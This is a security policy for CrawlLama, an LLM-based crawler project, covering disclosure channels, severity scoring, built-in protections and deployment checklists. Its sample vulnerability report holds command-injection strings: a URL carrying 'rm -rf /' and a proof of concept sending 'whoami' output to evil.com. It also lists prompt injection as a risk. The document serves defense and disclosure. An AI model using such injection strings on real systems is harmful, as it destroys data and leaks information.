The security of CrawlLama is important to us. If you discover a vulnerability, please report it responsibly.
We provide security updates for the following versions:

| Version | Supported |
|---|---|
| 1.4.8 | ✅ |
| 1.3.x | ❌ |
| 1.2.x | ❌ |
| < 1.2 | ❌ |
Do NOT create public GitHub Issues for vulnerabilities. This could put other users at risk.
Please report vulnerabilities responsibly via one of the following channels:

**GitHub Security Advisories:**
1. Go to Security Advisories
2. Click "Report a vulnerability"
3. Fill out the form with details

**Email:** crawllama.support@protonmail.com
- Subject: `[SECURITY] Short Description`
- Encryption: Proton Mail offers end-to-end encryption
Please provide as many details as possible:
- Type of vulnerability (e.g. Code Injection, XSS, Arbitrary File Read)
- Affected version(s)
- Steps to reproduce
- Proof of Concept (PoC) code or screenshot
- Potential impact (e.g. RCE, data leak, DoS)
- Suggested solution (optional)
- CVE-ID (if already available)
Example:
**Vulnerability:** Command Injection in page_reader.py
**Version:** v1.3.0
**Description:**
The function `fetch_page()` in `tools/page_reader.py` does not properly validate user input, which can lead to command injection.
**Steps:**
1. Start CrawlLama
2. Enter the following URL: `http://example.com; rm -rf /`
3. Command is executed on the system
**Impact:**
Remote Code Execution (RCE) as the user running CrawlLama
**PoC:**
```python
from tools.page_reader import fetch_page
fetch_page("http://evil.com$(whoami)")
```

**Suggestion:**
URL validation with `validators.url()` before processing
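A minimal sketch of such a pre-check, using only the standard library (the report suggests `validators.url()`; `urllib.parse` gives a comparable stdlib-only check, and the `is_safe_url` helper below is illustrative, not CrawlLama's actual code):

```python
from urllib.parse import urlparse

# Shell metacharacters that should never appear in a crawl target
SHELL_METACHARS = set(";|&$`<>")

def is_safe_url(url: str) -> bool:
    """Accept only well-formed http(s) URLs without shell metacharacters."""
    if any(ch in SHELL_METACHARS for ch in url):
        return False
    parsed = urlparse(url)
    return parsed.scheme in ("http", "https") and bool(parsed.netloc)
```

With this guard, both PoC inputs above are rejected before any command could be built from them.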
We strive for the following response times:
- Initial response: Within 48 hours
- First assessment: Within 7 days
- Fix for critical issues: Within 30 days
- Fix for moderate issues: Within 90 days
We use the CVSS v3.1 scoring system:

| Severity | CVSS Score | Examples |
|---|---|---|
| Critical | 9.0-10.0 | RCE, Authentication Bypass |
| High | 7.0-8.9 | SQL Injection, XSS |
| Medium | 4.0-6.9 | CSRF, Information Disclosure |
| Low | 0.1-3.9 | Minor Information Leaks |
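The score-to-severity bucketing can be expressed as a small helper (a sketch for illustration; CrawlLama does not necessarily ship such a function):

```python
def cvss_severity(score: float) -> str:
    """Map a CVSS v3.1 base score to the severity buckets used above."""
    if score >= 9.0:
        return "Critical"
    if score >= 7.0:
        return "High"
    if score >= 4.0:
        return "Medium"
    if score >= 0.1:
        return "Low"
    return "None"
```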
CrawlLama is designed for local operation. If exposed publicly (e.g. via FastAPI):
Important Security Measures:
- Authentication: Implement API key authentication
- Rate Limiting: Use the built-in rate limiting (`security.rate_limit`)
- Input Validation: All user inputs are validated
- Firewall: Expose API only via firewall/reverse proxy
- HTTPS: Use TLS for encrypted communication
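The built-in rate limiting can be illustrated with a minimal in-memory fixed-window limiter (a sketch using the documented default of 60 requests/minute; not CrawlLama's actual implementation, which can also back onto Redis):

```python
import time
from collections import defaultdict

class RateLimiter:
    """Allow at most `limit` requests per `window` seconds, per key."""

    def __init__(self, limit: int = 60, window: float = 60.0):
        self.limit = limit
        self.window = window
        self.hits = defaultdict(list)  # key -> recent request timestamps

    def allow(self, key: str) -> bool:
        now = time.monotonic()
        # Drop timestamps that have aged out of the window
        recent = [t for t in self.hits[key] if now - t < self.window]
        self.hits[key] = recent
        if len(recent) >= self.limit:
            return False
        recent.append(now)
        return True
```

Per-user, per-endpoint limiting follows by using `(user, endpoint)` tuples as keys.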

Risks when crawling external content:
- Malicious Content: Websites may contain harmful content
- SSRF: Server-Side Request Forgery via user-controlled URLs
- DoS: Infinite redirects or large downloads
Mitigation:
- Domain blacklist enabled (`data/blacklist.txt`)
- Timeout limits configured
- Max response size limited
- robots.txt is respected
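An SSRF check of the kind listed above can be sketched as follows (illustrative only: it resolves the host and rejects private, loopback, link-local, and reserved addresses, which is a simplification of a full check with DNS rebinding detection):

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_ssrf_safe(url: str) -> bool:
    """Reject URLs whose host resolves to a non-public IP address."""
    host = urlparse(url).hostname
    if not host:
        return False
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return False  # unresolvable hosts are treated as unsafe
    for info in infos:
        ip = ipaddress.ip_address(info[4][0])
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            return False
    return True
```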

Risks from LLM integration:
- Prompt Injection: Malicious prompts in search results
- Data Poisoning: False information in RAG database
- Model Hallucination: Generated misinformation
Mitigation:
- Hallucination detection enabled (`core/hallu_detect.py`)
- Output sanitization
- Source attribution
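Output sanitization can be sketched as a small cleaning step before display (illustrative only; CrawlLama's actual sanitization and hallucination detection are more involved):

```python
import html
import re

def sanitize_output(text: str) -> str:
    """Strip control characters and escape HTML before displaying LLM output."""
    # Remove control characters except tab, newline, and carriage return
    text = re.sub(r"[\x00-\x08\x0b\x0c\x0e-\x1f]", "", text)
    # Escape HTML so injected markup renders inert in a web UI
    return html.escape(text)
```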
We monitor dependencies regularly:
```bash
# Check dependencies
pip-audit
safety check

# Or with our script
python scripts/check_dependencies.py
```

Automatic updates: Dependabot is enabled and creates PRs for security updates.
CrawlLama has the following built-in security features:
**API Key Authentication:**

```
X-API-Key: your-secure-api-key-here
```

**Role-Based Access Control (RBAC):**

- admin: Full access to all endpoints
- user: Standard access (queries, memory, sessions)
- read_only: Read-only access (queries only)

**Cross-Site Request Forgery (CSRF) Protection** (required for all state-changing operations: POST/PUT/PATCH/DELETE):

```
# 1. Get CSRF token
POST /csrf-token
Headers: X-API-Key: your-key

# 2. Use token in subsequent requests
POST /config
Headers:
  X-API-Key: your-key
  X-CSRF-Token: token-from-step-1
```

**Input Validation** (`utils/validators.py`):

```python
validate_url()            # Check URL format
validate_query()          # Check query length/content
sanitize_output()         # Clean LLM output
validate_url_ssrf_safe()  # SSRF protection with DNS rebinding detection
```

**Rate Limiting:**

- Distributed rate limiting with Redis; falls back to in-memory if Redis is unavailable
- Per-user, per-endpoint limits
- Default: 60 requests/minute
- Configurable via the `RATE_LIMIT` environment variable

**Session Security:**

- Session timeout (24 hours by default)
- IP address tracking
- Last activity tracking
- Session refresh: `POST /session/refresh` extends the session expiration

**Audit Logging** (comprehensive security event logging):

- All API requests logged
- Authentication/authorization events
- Configuration changes
- Security events (CSRF, rate limits)
- Query audit logs (admin only): `GET /admin/audit/logs?event_type=authentication&status=failure`

**API Key Rotation** (graceful rotation with zero downtime; multiple active keys per user):

```
POST /admin/api-keys/generate           # Generate new key
POST /admin/api-keys/rotate             # Rotate existing key
GET /admin/api-keys/list                # List your keys
DELETE /admin/api-keys/revoke/{key_id}  # Revoke old key
```

**Domain Blacklist** (`data/blacklist.txt`): blocks known malicious domains:

```
malware-site.com
phishing-domain.net
```

**Secure Configuration:** API keys are stored encrypted:

```python
from utils.secure_config import SecureConfig

config = SecureConfig()
config.set_key("api_key", "secret")  # Stored encrypted
```

**Plugin Sandboxing:**

- Plugins run in a separate namespace
- No access to sensitive data
- Path traversal protection

**Security Headers:** all responses include comprehensive security headers:

- `Content-Security-Policy`: Strict CSP to prevent XSS
- `X-Content-Type-Options: nosniff`: Prevent MIME sniffing
- `X-Frame-Options: DENY`: Prevent clickjacking
- `X-XSS-Protection: 1; mode=block`: Legacy XSS protection
- `Strict-Transport-Security`: Force HTTPS (when using HTTPS)
- `Referrer-Policy: strict-origin-when-cross-origin`: Control referrer leakage
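For illustration, that header set can be kept as a plain mapping and merged into a response's headers (a sketch only; the CSP value shown is an assumed example, and CrawlLama applies these via its API layer):

```python
# Security headers as a mapping; the CSP policy below is illustrative.
SECURITY_HEADERS = {
    "Content-Security-Policy": "default-src 'self'",
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "DENY",
    "X-XSS-Protection": "1; mode=block",
    "Strict-Transport-Security": "max-age=31536000",
    "Referrer-Policy": "strict-origin-when-cross-origin",
}

def apply_security_headers(headers: dict) -> dict:
    """Return a copy of `headers` with the security headers merged in."""
    merged = dict(headers)
    merged.update(SECURITY_HEADERS)
    return merged
```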
CSRF protection includes Origin and Referer header validation for all state-changing requests.
Automatic security configuration validation on startup:
- Checks API key strength
- Validates allowed hosts/origins configuration
- Warns about insecure settings
- Optional strict mode to block startup on security issues
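A startup check in this spirit might look like the following (illustrative: `validate_security_config` and its exact checks are assumptions, though `CRAWLLAMA_API_KEY` and `ALLOWED_HOSTS` are the settings named in this document):

```python
import os
import sys

def validate_security_config(strict: bool = False) -> list:
    """Collect warnings about weak settings; exit in strict mode."""
    warnings = []
    key = os.environ.get("CRAWLLAMA_API_KEY", "")
    if len(key) < 32:
        warnings.append("CRAWLLAMA_API_KEY is shorter than 32 characters")
    if os.environ.get("ALLOWED_HOSTS", "*") == "*":
        warnings.append("ALLOWED_HOSTS allows any host")
    if strict and warnings:
        # Strict mode: refuse to start on any security warning
        sys.exit("Refusing to start: " + "; ".join(warnings))
    return warnings
```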
- Do not commit secrets: Use `.env` for API keys
- Strong API keys: Use keys with at least 32 characters
- Configure production settings:

  ```
  # .env
  CRAWLLAMA_API_KEY=your-strong-api-key-min-32-chars
  ALLOWED_HOSTS=yourdomain.com,www.yourdomain.com
  ALLOWED_ORIGINS=https://yourdomain.com,https://www.yourdomain.com
  RATE_LIMIT_SECRET=your-secret-for-rate-limiting
  REDIS_URL=redis://localhost:6379/0  # For distributed deployments
  ```

- Do not expose the API: Local access only recommended, or use a reverse proxy with TLS
- Use RBAC: Assign appropriate roles (admin/user/read_only) to API keys
- Rotate API keys: Regularly rotate keys using the rotation endpoint
- Monitor audit logs: Check `/admin/audit/logs` regularly for suspicious activity
- Keep updated: Install security updates promptly
- Enable CSRF protection: Always include CSRF tokens for state-changing operations
- Review sessions: Check active sessions and revoke suspicious ones
- Validate input: Use `validators.py` for all inputs
- Sanitize output: Clean LLM outputs before display
- Keep secrets out of code: Never in code, always in `.env`
- Check dependencies: Run `pip-audit` before every release
- Write security tests: Cover CSRF, RBAC, input validation, etc.
- Use CSRF protection: Apply `Depends(verify_csrf_token)` to state-changing endpoints
- Apply RBAC: Use `Depends(verify_role(Role.ADMIN))` for admin-only endpoints
- Log security events: Use `audit_logger` for security-relevant actions
- Follow the principle of least privilege: Grant the minimum necessary permissions
- Code review: Have security-critical changes reviewed
- Use HTTPS: Always use TLS in production
- Configure firewall: Only expose necessary ports
- Use Redis: Enable Redis for distributed rate limiting and CSRF storage
- Set strict mode: Enable `SECURITY_STRICT_MODE=true` to block startup on security issues
- Monitor logs: Set up log aggregation (ELK, Splunk, etc.)
- Backup API keys: Store key backups securely
- Document roles: Keep record of who has which role
- Regular audits: Review audit logs weekly
- Incident response plan: Have a plan for security incidents
- Update regularly: Subscribe to security advisories
- [ ] `pip-audit` shows no critical/high vulnerabilities
- [ ] No secrets committed in code/config
- [ ] `.env.example` contains only placeholders
- [ ] Domain blacklist updated
- [ ] Rate limiting enabled and tested
- [ ] Input validation for all user inputs
- [ ] Output sanitization for LLM responses
- [ ] CSRF protection applied to state-changing endpoints
- [ ] RBAC roles configured and tested
- [ ] Audit logging enabled and tested
- [ ] API key rotation mechanism tested
- [ ] Session management configured (timeouts, IP tracking)
- [ ] Security headers validated
- [ ] Origin/Referer validation tested
- [ ] Startup security validation passes
- [ ] Security tests pass (CSRF, RBAC, SSRF, XSS, path traversal)
- [ ] Documentation updated (SECURITY.md, API docs)
- [ ] Production configuration reviewed (ALLOWED_HOSTS, ALLOWED_ORIGINS)
- [ ] Redis configured for distributed deployments
- [ ] HTTPS/TLS configured for production
After fixing a vulnerability:
- Security advisory is published on GitHub
- CVE is requested (for high/critical)
- Release notes mention the fix (without details)
- Credits for the reporter (if desired)
- 30-day waiting period before full disclosure
We thank the following security researchers for responsible disclosure:
No reports yet - be the first!
Currently, we have no official bug bounty program.
However, we honor all security reports with:
- Public credits (if desired)
- Mention in release notes
- Hall of Fame entry
- GitHub Security: Security Advisories
Thank you for helping keep CrawlLama secure!